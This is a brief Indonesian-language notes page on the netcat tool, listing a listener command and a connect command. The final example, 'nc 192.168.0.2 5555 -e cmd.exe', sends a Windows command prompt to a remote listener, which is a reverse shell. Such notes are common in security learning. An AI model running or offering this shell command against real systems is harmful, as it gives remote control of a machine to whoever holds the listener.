Skip to main content

Netcat

nencat(command: nc atau ncat) adalah salah satu tool TCP/UDP transport.

Command

linten conection yang masukk

nc -lvp 5555

connect command prompt ke netcat server

nc <ip> <port> -e command

contoh:

nc 192.168.0.2 5555 -e cmd.exe